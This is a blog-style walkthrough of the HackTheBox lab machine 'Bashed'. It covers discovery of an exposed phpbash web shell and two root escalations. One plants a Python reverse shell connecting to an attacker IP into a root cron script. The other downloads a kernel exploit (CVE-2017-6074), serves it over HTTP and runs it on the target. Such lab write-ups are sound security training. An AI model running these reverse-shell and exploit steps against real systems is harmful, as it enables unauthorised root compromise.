Walkthrough - Bashed on HackTheBox

August 22, 2022

Bashed is another classic Linux machine on HackTheBox, and can be pwned through some careful observation.

C'est parti!

Nmap

Let's start with a port scan:

nmap box.htb -v -sV

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))

Note: box.htb has been configured to point to the machine in /etc/hosts on Kali

We see that the machine is running Apache on port 80. Let's take a look:

The webpage makes reference to phpbash which acts as a web command line interface. The blog post hints that phpbash is also being hosted on the Apache server.

Phpbash

Using dirbuster, we quickly find that phpbash.php is being hosted on box.htb/dev/phpbash.php

Right off the bat, we can grab the user flag:

cat /user/arrexel/user.txt
fa75e3**************************

Privilege Escalation

Now we need to try and obtain root privileges.

Method 1 - Cron/Sudo Misconfiguration

It's a good idea to check for any sudo misconfigurations when attempting privilege escalation, which we can do this using the sudo -l command.

sudo -l

Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL

The last line of the command output tells us that we can execute any command as scriptmanager without being authenticated by sudo.

This can be done by executing sudo -u <username> <command>.

This looks like a potential privilege escalation vector, now let's try and determine scriptmanager's access privileges:

sudo -u scriptmanager id
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)

We can see that scriptmanager belongs to the scriptmanager group. There may be files or directories belonging to the scriptmanager user.

find / -group scriptmanager 2>/dev/null
/scripts
/scripts/test.py
/scripts/test.txt
...

The scripts directory is an interesting one, because if you pay close attention, you will see that the timestamp of test.txt is being changed every minute and is owned by the root user.

This means that the root user has a cron job set to execute all the scripts within the scripts folder every minute. Easy privesc by modifying the test.py to initiate a Python reverse shell, like the one below:

import socket,subprocess,os
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("<attacker-ip>",<port>))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

After about a minute, you should have access to the reverse shell.

cat /root/root.txt
1947e3**************************

Alternatively, you can opt to escalate your privileges using a kernel exploit, which you can read more about below:

Method 2 - Kernel Exploit

Let's determine the version of Linux being run on this machine:

uname -a
Linux bashed 4.4.0-62-generic

A quick Google search reveals that this version of Linux is vulnerable to a kernel exploit. (CVE:2017-6074)

Download the exploit and compile it on your attacking machine:

wget https://www.exploit-db.com/download/41458
mv 41458 poc.c
gcc poc.c -o pwn

We can setup a simple HTTP server on the attacking machine to host the kernel exploit:

python -m SimpleHTTPServer <port>
Serving HTTP on 0.0.0.0 port 1234 ...

Now, download the exploit on the victim machine:

wget http://<attacker-ip>:<port>/pwn

Make the pwn file executable:

chmod +x pwn
./pwn

And voila!

cat /root/root.txt
1947e3**************************

htb walkthrough linux easy